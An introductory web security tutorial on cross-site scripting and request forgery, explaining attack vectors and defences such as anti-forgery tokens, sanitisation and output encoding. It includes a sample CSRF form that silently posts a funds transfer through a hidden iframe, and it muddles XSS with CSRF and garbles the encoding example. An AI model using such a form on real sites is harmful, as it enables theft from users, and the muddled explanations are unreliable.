What is Cross Site Scripting? (XSS) How is it Used to Attack Websites
In this tutorial, we are going to learn about Cross Site Scripting XSS. We'll look at the concept of untrusted data and input sanitisation.

By Tim Trott | Privacy & Security | February 10, 2016

1,937 words, estimated reading time 7 minutes.

| (0) | (0)

Internet Security 101

This article is part of a series of articles. Please use the links below to navigate between the articles.

So what exactly is untrusted data? Well, it's any piece of data in which the integrity cannot be verified, the intent may be malicious or can include payloads such as SQL injection. Cross-site scripting can even be used to distribute binary data containing malware.

This untrusted data can come from many sources, but the main source is from the user, either via a query string in the URL, posted in a form submit or as we've seen previously by manipulating the raw HTTP request. We must also consider the possibility that your database contains untrusted data - for example storing form submit content in the database.

What is a Cross-Site Scripting Attack?

A Cross-Site Scripting (XSS) Attack is a type of injection whereby malicious scripts are injected into normally safe and trusted websites. These scripts can perform actions such as logging keystrokes, downloading and installing malware, stealing personal information or some other action which may be of detriment to the user.

Cross-Site Scripting Attacks are typically carried out against authenticated users and involve the user acting on the attacker's behalf.

There isn't much value in getting an unauthenticated user to act, but huge value if you can get an authenticated user to. A classic example would be for a victim to authenticate to their online bank and transfer money into the account of the attacker. If the victim is authenticated and the attacker can trick the victim into requesting on their behalf, they can carry out the transaction.

The only thing that makes a user authenticated is the authentication cookie, which we have seen before. If this is left vulnerable, it is open as a possible attack vector. As we have seen in previous tutorials, cookies are sent with every request, secure or insecure. If an authentication cookie is transmitted over insecure methods, its contents can be captured and the session hijacked. Even if the cookie is secure, XSS attacks can still leave an application and users vulnerable.

So how do we (as an attacker) trick a victim into making a request that they never intended to which has malicious intent to advantage the attacker?

Cross Site Request Forgery

To understand how much of a problem XSS is, we must understand how a user session is authenticated. Since HTTP is a stateless protocol (each request knows nothing about the previous request) cookies are used to maintain state through the use of a session id. This links back to a session on the server, usually a database, so when the request is processed by the server it knows who the user is. The authentication cookie is sent automatically to the website with EVERY request, the website then identifies and authorises the user based on that cookie.

Let's continue with the example of the online banking application. We have a user, who has authenticated successfully to the application, they have an authentication cookie. Now, every time they request the server that authentication cookie is sent along to reauthenticate the session. It's not the user doing this though, you are never aware of sending the cookie, it is the browser which does this for you. This is an important distinction because it is the browser that we will be tricking.

What the attacker is aiming to do is to send a malicious request to the server using the user's browser. When that request is issued, the cookie will, of course, be sent along with it. All of this happens against a legitimate website, with a legitimately constructed request it's just that the request is one the user didn't intend.

How are Cross Site Scripting Attacks Performed

In the most basic Cross Site Scripting attack, a script (usually a javascript include tag to a script on a remote server) is submitted as part of a form tag, it could be a username on a registration page, comments on a blog post or any other piece of data submitted on a form which is then sent to other users. If the input is not properly sanitised, this script tag will then be rendered out to any users visiting that page.

Lady Gaga Hacked

In 2012, the Twitter account of Lady Gaga was hacked, and a malicious link was added to the Twitter feed. Many attacks come from reputable sources such as Twitter and Facebook, sites where attackers can share links. The attacks are based on the user following a link to the attacker's website, which mounts the attack.

Lady Gaga Official Twitter Account Hacked

So here is a nice little enticement. A free Macbook! It looks legit, the source is Lady Gaga so it can't possibly be bad! Right? So the user goes ahead and clicks the link. They are then sent to the attacker's website, which will probably be styled to look like an authentic page and use a similar domain name, but one which they control, for example, mapple.com Very similar, but different.

The attacker's page will then get the user to act, typically by filling in a form and clicking a button.

Common Attack Vectors

Another attack vector is the use of search queries. A typical behaviour for a website search box is to redirect to a search engine-friendly search page which contains the search term in the URL. So, for example, if you search for "camera" you may well get redirected to the search page "/search/camera/". The page may also contain some fancy programming which extracts this search term, performs the search and shows some text saying something like "Here are your results for 'camera'". If this URL parameter is not properly sanitised, then a malicious script could then be injected and rendered to the page. It's then simply a matter for the malicious user to then use a URL shortener for this crafted URL and distribute it on social media. Any users who click a link to your site with the malicious search parameter in the URL will be compromised.

Persistent XSS attacks

Persistent XSS is an attack not through the URL but is instead injected into your database. This type of attack is commonly used in blog comments by spammers and malicious hackers. Each time a visitor accesses the compromised page, the malicious script is downloaded and executed on their browser. This type of attack doesn't rely on a user clicking on any links to get to a page, nor does it rely on crafted query strings. The attack is already in your database from an earlier, presumably missed input sanitisation.

How Cross Site Scripting Attacks Work

Now, on the attacker's page, the user will be presented with a form and a button to click. When the button is clicked there is a postback to the server and the contents of the form are sent in that post request. In the hacker's page, however, the form post URL is to the online banking transfer of funds address, and the form controls are constructed in such a way as to send the correct form data that the banking page needs, and the browser will automatically attach the authentication cookie. As far as the banking server is concerned, it just received a request to transfer funds, from the victim's browser, using a valid authentication cookie so it goes ahead and processes the transaction.

So what does the form structure look like?

<form action="http://www.myonlinebank.com/transfer" method="POST" target="hiddenFrame">
  <input type="hidden" name="targetAccount" value="6365584" />
  <input type="hidden" name="amountToTransfer" value="99.99" />
  <input type="submit" value="Win an iPad" onclick="alert('You Won!!!')" />
</form>

<iframe name="hiddenFrame" style="display:none;visibility:hidden"></iframe>

In this form, contained on the attacker's website, the form is going to post all the values to the online bank transfer address. It is going to pass two parameters the account of the attacker, and the amount to transfer. When the button is clicked the request is sent to the online banking application together with the authentication cookie and the funds transferred. To prevent the user from seeing what is happening, the request is sent to the hidden frame.

This is an overly simplified example, but it serves to show how an attack could be constructed. It relies on the user being pre-authenticated to the banking website, clicking a link from an external source to the attacker's website and then completing the action. So this introduces a new attack vector to the mix, that of tricking the user. This is called social engineering, and we'll look at this in the next tutorial.

How to Prevent Cross Site Scripting

Untrusted data will most likely come from a URL parameter or a post-data parameter.

Anti-forgery tokens

The attack we just saw is so prevalent and so easy because the attack relies on a very specific, known pattern. The attack merely replicates exactly what the actual application would do, the attacker just controls the values in the POST request.

So how can we mitigate against CSRF attacks? The only real protection against CSRF attacks is through the use of an anti-forgery token. This token is used to ensure that the authentication cookie and the form POST request match up.

The server will add a hidden field to the legitimate form containing a token, that token is also paired with another token added to the authentication cookie. The attacking website has no access to this token and therefore no means to replicate it in the form submit. When the form is submitted, the server first checks to see if the request contains the anti-forgery token, if it does it checks it matches the contents of the authentication cookie. Only if the two match will the transaction be completed.

Anti-forgery tokens add randomness to the request pattern. The attacker does not have access to the token, therefore, cannot submit the token in a hidden field. The cookie verifies the token in the hidden field.

Input Sanitisation

There are several methods for preventing XSS. The most common, simplest and most effective method is to use input sanitisation. This involves identifying data that could be used as a malicious attempt and removing or replacing it.

Examples of potentially untrusted data include the use of ' / " and; characters. These are often used to inject script tags into pages or to launch SQL injection attacks. We'll see more of these when we look at parameter tampering.

Another method is to employ a whitelist or blacklist approach to processing inputs. A Whitelist is very explicit: "This is what we know is good, so we're only going to allow these. A blacklist, on the other hand, is very implicit: "This is what could be bad so everything else must be ok"

Output Encoding

Another essential sanitisation method in addition to input sanitisation is to encode the output as well. This will prevent things like script tags from being rendered, instead, they will be shown as harmless text and not executed. For example, the opening script tag would be encoded to <script />.

Most frameworks and platforms have built-in methods for sanitising input and encoding outputs. Please research these functions for your platform or framework.

Server Headers

The X-XSS_Protection header is another protection mechanism in modern browsers. Because XSS attacks conform to a fairly simple pattern - loading a script from another remote server, browsers can be instructed to detect XSS attacks and block or warn about them. You cannot rely on this however, you still need to implement input sanitising and output encoding, this is just another level of security.